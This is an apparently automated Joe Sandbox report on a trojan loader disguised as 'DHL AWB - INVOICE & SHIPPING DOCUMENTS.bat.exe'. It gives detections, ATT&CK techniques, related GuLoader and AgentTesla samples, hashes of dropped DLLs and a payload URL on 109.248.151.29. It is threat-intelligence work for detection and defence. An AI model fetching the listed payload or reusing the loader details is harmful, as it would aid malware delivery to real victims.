          File and Directory Discovery
          Distributed Component Object Model1
          Clipboard Data
          13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Process Injection
          LSA Secrets126
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Deobfuscate/Decode Files or Information
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Obfuscated Files or Information
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe100%AviraHEUR/AGEN.1338492
          DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe15%VirustotalBrowse
          DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe11%ReversingLabs
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsxA376.tmp\BgImage.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsxA376.tmp\BgImage.dll0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll1%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsxA376.tmp\UserInfo.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsxA376.tmp\UserInfo.dll0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsxA376.tmp\nsExec.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsxA376.tmp\nsExec.dll0%VirustotalBrowse
          No Antivirus matches
          SourceDetectionScannerLabelLink
          api.ipify.org0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://api.ipify.org/p0%Avira URL Cloudsafe
          https://api.ipify.org/0%Avira URL Cloudsafe
          https://api.ipify.org0%Avira URL Cloudsafe
          http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
          http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
          https://api.ipify.org1%VirustotalBrowse
          http://nsis.sf.net/NSIS_Error0%VirustotalBrowse
          https://api.ipify.org/1%VirustotalBrowse
          https://api.ipify.org/p0%VirustotalBrowse
          http://109.248.151.29/MnBzHGsyHle133.bin30%Avira URL Cloudsafe
          https://api.ipify.org/t0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
          http://www.skinstudio.netG0%Avira URL Cloudsafe
          http://109.248.151.29/MnBzHGsyHle133.bin100%Avira URL Cloudmalware
          http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
          http://109.248.151.29/MnBzHGsyHle133.bin(30%Avira URL Cloudsafe
          https://api.ipify.org/t0%VirustotalBrowse
          https://api.ipify.org/TtK0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
          https://api.ipify.org/TtK0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          api.ipify.org
          104.26.12.205
          truefalseunknown
          NameMaliciousAntivirus DetectionReputation
          https://api.ipify.org/false
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://109.248.151.29/MnBzHGsyHle133.binfalse
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://api.ipify.orgDHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmp, DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036B81000.00000004.00000800.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.ipify.org/pDHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorDHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorErrorDHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmp, DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000000.00000000.1231425770.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.ipify.org/tDHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmp, DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036B81000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://109.248.151.29/MnBzHGsyHle133.bin3DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6335321525.0000000006408000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmp, DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036B81000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.skinstudio.netGDHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://109.248.151.29/MnBzHGsyHle133.bin(3DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6335321525.0000000006408000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.ipify.org/TtKDHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          104.26.12.205
          api.ipify.orgUnited States
          13335CLOUDFLARENETUSfalse
          109.248.151.29
          unknownRussian Federation
          52048DATACLUBLVfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1465167
          Start date and time:2024-07-01 12:23:39 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 16m 3s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:14
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@3/17@1/2
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 89%
          • Number of executed functions: 103
          • Number of non-executed functions: 60
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
          • Execution Graph export aborted for target DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, PID 10220 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          104.26.12.205SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
          • api.ipify.org/
          482730621.exeGet hashmaliciousStealitBrowse
          • api.ipify.org/?format=json
          482730621.exeGet hashmaliciousStealitBrowse
          • api.ipify.org/?format=json
          Sonic-Glyder.exeGet hashmaliciousStealitBrowse
          • api.ipify.org/?format=json
          Sky-Beta.exeGet hashmaliciousStealitBrowse
          • api.ipify.org/?format=json
          SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
          • api.ipify.org/
          lods.cmdGet hashmaliciousRemcosBrowse
          • api.ipify.org/
          109.248.151.29Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
          • 109.248.151.29/DttVKmqMztLpGMCsim17.bin
          Order 000293884849900.bat.exeGet hashmaliciousGuLoaderBrowse
          • 109.248.151.29/RjdSJnnj92.bin
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          api.ipify.orgOrder 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
          • 172.67.74.152
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          Potwierdzenie zam#U00f3wienia.doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
          • 172.67.74.152
          Vsl_MV DART TRADER_001.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36Get hashmaliciousHTMLPhisherBrowse
          • 104.26.12.205
          DHL Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36Get hashmaliciousHTMLPhisherBrowse
          • 172.67.74.152
          ORDERDATASHEET#PO8738763.scr.exeGet hashmaliciousAgentTesla, RedLine, SugarDump, XWormBrowse
          • 104.26.13.205
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          Find-DscResource_QoS.ps1Get hashmaliciousUnknownBrowse
          • 104.26.12.205
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CLOUDFLARENETUSINQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
          • 172.67.148.197
          zahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          scan copy.exeGet hashmaliciousSnake KeyloggerBrowse
          • 188.114.97.3
          Renameme@1.xlsGet hashmaliciousUnknownBrowse
          • 104.21.18.65
          Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
          • 172.67.74.152
          https://oceanofgames.com/Get hashmaliciousUnknownBrowse
          • 172.67.213.70
          http://johnlewisfr.vipGet hashmaliciousUnknownBrowse
          • 104.26.13.204
          Renameme@1.xlsGet hashmaliciousUnknownBrowse
          • 104.21.18.65
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          Potwierdzenie zam#U00f3wienia.doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
          • 172.67.74.152
          DATACLUBLVOrder 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
          • 109.248.151.29
          Order 000293884849900.bat.exeGet hashmaliciousGuLoaderBrowse
          • 109.248.151.29
          rUniversidadedeBras#U00edlia-ProjetoFMD20240342.vbsGet hashmaliciousUnknownBrowse
          • 109.248.151.238
          17194198846f19431fa86ff695fe063dadb4561f59dac5dc011432c27d123f4314e8bbacda424.dat-decoded.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
          • 109.248.151.231
          8x121Y7FNW.jsGet hashmaliciousAveMaria, PrivateLoaderBrowse
          • 109.248.151.231
          Product Specifications_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 109.248.151.238
          RCBC Plaza Project Quotation.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 109.248.151.238
          ELMA _CO LLC_pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
          • 109.248.151.238
          UNIVERSITY OF SHARJAH- Project FMD20240342.vbsGet hashmaliciousFormBook, GuLoaderBrowse
          • 109.248.151.238
          ELMA CO LLC Main File_pdf.vbsGet hashmaliciousGuLoaderBrowse
          • 109.248.151.238
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3b5074b1b5d032e5620f69f9f700ff0eNew Order CHAL-0435.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 104.26.12.205
          Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
          • 104.26.12.205
          awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
          • 104.26.12.205
          Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbsGet hashmaliciousUnknownBrowse
          • 104.26.12.205
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.12.205
          DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoaderBrowse
          • 104.26.12.205
          Potwierdzenie zam#U00f3wienia.doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
          • 104.26.12.205
          Setup-10.msiGet hashmaliciousUnknownBrowse
          • 104.26.12.205
          BQ & Drawings_pdf.r00.vbsGet hashmaliciousUnknownBrowse
          • 104.26.12.205
          https://bpecuniaimmobili.com/J0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MzY/Get hashmaliciousUnknownBrowse
          • 104.26.12.205
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dllOrder 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
            004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
              004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
                  004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                    P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                      P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                        pp0fHVNbib.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          pp0fHVNbib.exeGet hashmaliciousGuLoaderBrowse
                            C:\Users\user\AppData\Local\Temp\nsxA376.tmp\BgImage.dllOrder 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
                              004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                                004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                                  Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
                                    004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                                      P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                                        P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):49
                                          Entropy (8bit):4.75216571132969
                                          Encrypted:false
                                          SSDEEP:3:a6QLQIfLBJXlFGfv:xQkIPeH
                                          MD5:797DA95245047A54F125FBF3B19FA295
                                          SHA1:9E46F51C033836343C4099609F35B9B62C290A00
                                          SHA-256:A047914D1DB23829E36D3A2A908D83F4B51F5A8194AE090BB9F9AB9F8DDA9128
                                          SHA-512:4755C72A469C7C816D7B4A08BFEABFC266AAD029156A301E2592E3AFD16C5DB5FCE44C4475CB83C43B859A06AD069370182FCA5CAFACF4A27D191F4C0AE34A03
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:[Loading]..Start=user32::EnumWindows(i r2 ,i 0)..
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):7680
                                          Entropy (8bit):5.188410641489526
                                          Encrypted:false
                                          SSDEEP:96:8eQMA6z4f7TI20Y1wircawlkX1b3+LDfbAJ8uLzqkLnLiEQjJ3KxkP:tChfHv08wocw3+e8uLmyLpmP
                                          MD5:2D5F40DDC34E9DC8F43B5BF1F61301E3
                                          SHA1:5ED3CD47AFFC4D55750E738581FCE2B40158C825
                                          SHA-256:785944E57E8E4971F46F84A07D82DEE2AB4E14A68543D83BFE7BE7D5CDA83143
                                          SHA-512:605CEBCC480CB71BA8241782D89E030A5C01E1359ACCBDE174CB6BDAF249167347ECB06E3781CB9B1CC4B465CEF95F1663F0D9766ED84EBADE87AA3970765B3E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Joe Sandbox View:
                                          • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                                          • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                          • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                          • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                                          • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                          • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                          • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L....C.f...........!......................... ...............................P............@..........................$....... ..d............................@....................................................... ...............................text...3........................... ..`.rdata....... ......................@..@.data...$....0......................@....reloc..l....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):12288
                                          Entropy (8bit):5.744994954995265
                                          Encrypted:false
                                          SSDEEP:192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
                                          MD5:12B140583E3273EE1F65016BECEA58C4
                                          SHA1:92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
                                          SHA-256:014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
                                          SHA-512:49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 1%, Browse
                                          Joe Sandbox View:
                                          • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                                          • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                          • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                          • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                                          • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                          • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                          • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                          • Filename: pp0fHVNbib.exe, Detection: malicious, Browse
                                          • Filename: pp0fHVNbib.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....C.f...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4096
                                          Entropy (8bit):3.327532764383977
                                          Encrypted:false
                                          SSDEEP:48:qKNKyd+Z46pHT1wHsl9rEGbgPgVZShMmj3OPRYBA:5JSRzuHsxE4VH6O+i
                                          MD5:90228DD140188EC0CA02F7F52E4C9A30
                                          SHA1:6880D9AEEC4C97C4B7718044C9C59B92379FEACA
                                          SHA-256:54BCF3D018734B884BD33A74A05EEA0AC3C83501ACBDB71EA8EC56EC9402A263
                                          SHA-512:1A38B1EBB9E2440DD240C8CD2406261E21B544ED392F808D36F78590075F854D89E624589BFDDABCACE96B33A7F3084C7686351BD66AE07EC035BBEF94EF8DA2
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................|........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...X....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):6656
                                          Entropy (8bit):5.178709395875687
                                          Encrypted:false
                                          SSDEEP:96:z0OBtYZKtPsrqBApt1JHpb9XWk7Qe06iE6mE6YNFyVOHd0+uPHwEX:4tZKtrAJJJbP7iEHEbN8Ved0Ph
                                          MD5:4A2F4FE4A3AD1DE56EE6BF7DD4923963
                                          SHA1:7CC68B94448C964FD99904E5784B059AED4D5DAA
                                          SHA-256:89B1E6509A1B45B32933E9D785A9C8C5B9CE7C616E1112DCF7FC3FA5CA27EBDE
                                          SHA-512:4B6BBE75BEAFAE9A29932FF5DDD3940AADFAE62C157836E6CDAB755955782DD5354D5EB389B4B8C16BF59F4CE7A099A0161D915C1CF2968F28E195DC8E3997EA
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):25
                                          Entropy (8bit):4.163856189774724
                                          Encrypted:false
                                          SSDEEP:3:+gMn:8
                                          MD5:ECB33F100E1FCA0EB01B36757EF3CAC8
                                          SHA1:61DC848DD725DB72746E332D040A032C726C9816
                                          SHA-256:8734652A2A9E57B56D6CBD22FA9F305FC4691510606BCD2DFCA248D1BF9E79C7
                                          SHA-512:D56951AC8D3EB88020E79F4581CB9282CA40FAA8ADC4D2F5B8864779E28E5229F5DFE13096CF4B373BBC9BC2AC4BFC58955D9420136FB13537F11C137D633C18
                                          Malicious:false
                                          Preview:[Caps]..Setting=Enabled..
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3011
                                          Entropy (8bit):4.875614577841428
                                          Encrypted:false
                                          SSDEEP:48:Sl+lWlUMDNbr6641SO9Agz4x2qEtyTgz0gWP5CZ9sam0uxKKhY7SDEf:W+lLMDNbr6641S0z4xFEITggV+9zXa3Q
                                          MD5:6103DF2AF52F53D95AF61664D1866FFE
                                          SHA1:6AD99D4586667B497725EEC01AE0A772C441C1D4
                                          SHA-256:6AA446B014371D8DD9EF43D2A103E9CA8A0F61A3AFC4676BFC63AD07C1977C7E
                                          SHA-512:2AFA117DD3ACB8B695FFBC0F236E8B87F1DD4A7EAFD79A26CB4F191EED76DEBA7CBB106F3E78218769581C014840D039A4E173340CA0D6C2D2DFF0B5C5138096
                                          Malicious:false
                                          Preview:...W..n......t......b.5..Cb....&.................:....Q........x.i..../........h....x.`......(...D..x`...........'...M..z..v.........J.;...3...B.......#..s.._......p....q.,.t..........J.............................5...W.;B...G......._.............G.".3...mi..9.=..4.......V........7......@..o.1..n...u......9............=........D...........=.........y..).............Q.q................zG....O.0.}C...@......8.9bg.M...<........r......!Y.J.......A..........;.R............3..\...4.....N.2.X.i.......'.s..0....7....<...6.<......~..........).>..]...;....I...........:...R.....Lg....v..8............m.................T.$......ry5.5......A............M.............p..k..........2...~.k......................Y.Y`...}.....f.......8.PE........m...:.......a~......l-8..P..z..%.0.....]..L:.....E....?9.1.......;...E.....|...t.....n................vH.....u.................Q.<.Y....8......r.v............7........,1....Z.....c..6.G.....xc..j...8.H~....#.........F.,.......{-.VQ..6.v..u..f.....$.
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3794
                                          Entropy (8bit):4.876163305802233
                                          Encrypted:false
                                          SSDEEP:96:LnmpgKl8MI0hs4Qnu6lgB+EQFO+trNMgUIkR:7UpaMI34iu6eBdwO+8rIkR
                                          MD5:0629DF955F60990975A3C8EF199B57E9
                                          SHA1:FE57FA7FDF44B6E789A760C5292FD8DAE221187B
                                          SHA-256:499908BD96C7F2D9BC0F94433CC14C482C002C07A09DF0D73AF45BC17C4DA70B
                                          SHA-512:753EB2360926F32A6ED70E034FEAA57D6274756C3CE60914A4A1EC12DC07ACAC92C7906E3FE48A76F74BBEFBE8EAC023D352D11A087F47DEE9BD0ACBB59331F8
                                          Malicious:false
                                          Preview:.s............W?...T.7.h....~..2....4....`...Z....n..,.....L#.<....`j......U.................l...n.....................j......_...!/...........A........-.......Tk.................W......wv.4.N.....................>....n.T....OP.....%..e..."....,...]U...R. ..4.1k..........3J.%......d.....W............~..z...`........p......~D.....o..[...ib.......C......A..........%.....{.......W.r...............f...h....<...........~.......9.#.......0B>..o..*............,....p........T....J...]Y.S .........#.............................z......3..........{....H....p......v......V..F......,U..=.......R......Q.._.-4........,1...0.............v...z.............2<g.......;....!........g..d.1......d.J-......E.q......,.+...>.4eh...|T.:....B.......C........U......?.>..7.....h.....:...."..!..........6..........................B.@D.W.....8..............t..H.h............................S...h.....x....5......c."...................Q>.....2.5...)....%......T.....v........;1.......x.'.D.....y=.......O........
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):12525
                                          Entropy (8bit):4.544077934672787
                                          Encrypted:false
                                          SSDEEP:192:7NEPgv6otln2xIezOgr141L0SXYZoZh5ROedTjzznjhHCSDnf7Nyj:uPgvbXD81WieZhjtzjhiKfByj
                                          MD5:41CCFA13E5C8C07E20030CFFD43F1177
                                          SHA1:3C3435392858891E2A10AED297209AE474D355BF
                                          SHA-256:5EDFAF67791E6D6EEEA4C27A6318616D7DEE9162E7225972131DDCEF65C1741B
                                          SHA-512:BF89EB697AFF80775FC98D5B50930503FAC3310D2FCA2E200F672164E5A430554D1783DF636C8CB8D742BC2E4A3680419E59B098093569E864F15B4ACB05AEA9
                                          Malicious:false
